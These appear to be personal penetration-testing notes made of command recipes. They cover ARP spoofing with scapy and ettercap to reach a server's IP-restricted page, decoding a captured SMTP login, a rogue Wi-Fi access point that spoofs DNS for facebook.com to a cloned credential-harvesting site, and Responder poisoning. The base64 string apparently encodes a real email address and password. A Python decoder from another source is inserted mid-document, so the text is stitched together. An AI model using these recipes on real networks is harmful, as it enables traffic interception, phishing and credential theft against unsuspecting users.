dst= ff:ff:ff:ff:ff:ff 

src= 00:25:11:ad:1a:42 

type= LOOP 

 

look up the MAC address of the HTTP server:

 

# scapy 

>>> arping('192.168.149.0/24') 

 

suppose the MAC address found for the HTTP server is: 00:50:56:c0:00:08

 

>>> e.dst = '00:50:56:c0:00:08' (MAC address of the HTTP server)

>>> a = ARP() 

>>> a.show() 

 

###[ ARP ]### 

hwtype= 0x1 

ptype= IPv4 

hwlen= 6 

plen= 4 

op= who-has 

hwsrc= 00:25:11:ad:1a:42 

psrc= 192.168.149.139 

hwdst= 00:00:00:00:00:00 

pdst= 0.0.0.0 

 

>>> a.hwdst = '00:50:56:c0:00:08' (MAC address of the HTTP server)

>>> a.pdst = '192.168.149.1' (IP of the HTTP server)

>>> a.psrc = '192.168.149.135'  (IP allowed to access the pages on the server)

 

carry out the MAC address spoof:

 

>>> while 1 : sendp(e/a) 

 

now we need to receive the packets going from 192.168.149.1 to 192.168.149.135,

and we do so with an ettercap filter:

 

vi filter.e 

 

if(ip.dst == '192.168.149.135' && ip.src == '192.168.149.1'){

#drop();

ip.dst = '192.168.149.139';

msg("RaN\n\r");

}

 

compile the filter for ettercap:

 

# etterfilter filter.e -o filter 

 

launch ettercap:

 

# ettercap -F filter -M ARP // // -Tpq 

 

if I now connect to the HTTP server I can see the restricted page

 

 

- discover DHCP servers with nmap

 

sudo nmap --script broadcast-dhcp-discover -e eth0

 

 

- Decode the SMTP base64 authentication string

 

SMTP PLAIN authentication encodes user and password in base64, so to convert it to plain text I use:

echo "AGRpcmV6aW9uZUBtZXBlbC5pdAA0MzdkcjY2Mg==" | base64 -d
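An added example, not part of the original notes, showing what `base64 -d` is actually printing: the AUTH PLAIN payload is three fields separated by NUL bytes (RFC 4616), which are invisible on a terminal. The sample credential is constructed for the example; the redacted summary is what one would write to a log when reviewing a capture.

```python
import base64
from typing import Tuple

# Constructed sample (not a real credential): what a client sends after
# "AUTH PLAIN" for authcid user@example.com and password hunter2.
SAMPLE_AUTH_PLAIN = base64.b64encode(b"\x00user@example.com\x00hunter2").decode("ascii")


def encode_auth_plain(authzid: str, authcid: str, password: str) -> str:
    """Build the base64 AUTH PLAIN payload: [authzid] NUL authcid NUL passwd."""
    raw = b"\x00".join(s.encode("utf-8") for s in (authzid, authcid, password))
    return base64.b64encode(raw).decode("ascii")


def decode_auth_plain(blob: str) -> Tuple[str, str, str]:
    """Split a base64 AUTH PLAIN payload into (authzid, authcid, password).

    strip() drops the trailing newline that `echo` adds; validate=True makes
    any non-base64 character raise binascii.Error (a ValueError subclass).
    """
    raw = base64.b64decode(blob.strip(), validate=True)
    parts = raw.split(b"\x00")
    if len(parts) != 3:
        raise ValueError("AUTH PLAIN payload must have exactly two NUL separators")
    authzid, authcid, password = (p.decode("utf-8") for p in parts)
    if not authcid or not password:
        raise ValueError("authcid and password must be non-empty")
    return authzid, authcid, password


def is_well_formed_auth_plain(blob: str) -> bool:
    """True if the blob decodes to a structurally valid AUTH PLAIN payload."""
    try:
        decode_auth_plain(blob)
    except (ValueError, UnicodeDecodeError):
        return False
    return True


def redacted_summary(blob: str) -> str:
    """Log-safe description of a captured AUTH PLAIN: identities kept, secret masked."""
    authzid, authcid, password = decode_auth_plain(blob)
    return f"authzid={authzid!r} authcid={authcid!r} password=<redacted, {len(password)} chars>"


if __name__ == "__main__":
    print(redacted_summary(SAMPLE_AUTH_PLAIN))
```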

 

 

- Fake access point + DNS spoofing + fake website

 

pkill airbase-ng

pkill dhcpd

 

apt-get install isc-dhcp-server

vi /etc/dhcp/dhcpd.conf

 

Set the dhcpd subnet

subnet 192.168.2.0 netmask 255.255.255.0 {

range 192.168.2.100...

 

airmon-ng stop wlan0

airmon-ng start wlan0 (the wifi interface that will become the fake access point)

airbase-ng -e accesspointname -c 11 -v wlan0mon 

iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

iptables -P FORWARD ACCEPT

iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE (wlan1 is our interface connected to the internet)

ifconfig at0

ifconfig at0 192.168.2.1 netmask 255.255.255.0

route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1

dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0 &

echo 1 > /proc/sys/net/ipv4/ip_forward

Now:

service apache2 start

Or clone a site to harvest credentials:

use setoolkit (Social-Engineer Toolkit)

and select:

1 social engineering attack

2 website attack vector

3 credential harvester attack method

2 site cloner

 

locate etter.dns

vi /etc/ettercap/etter.dns

 

Then, in etter.dns, set up DNS spoofing for a site, e.g.:

www.facebook.com A 192.168.2.1

facebook.com A 192.168.2.1

 

ettercap -G

sniff->unified sniffing->network interface->at0

plugins->manage the plugins->dns_spoof

Hosts->scan for hosts (to be run after a host has connected to the fake AP)

Or:

Host->host list

and select the network gateway as target1 and the victim's IP as target2

Target->current target (to see the selected targets)

Mitm->arp poisoning->sniff remote connections

Start-> start sniffing

 

- Responder: sniff and poison SMB traffic

 

sniff and poison SMB traffic (LLMNR, NBT-NS and MDNS poisoner)

sudo Responder.py -I eth0 -wrf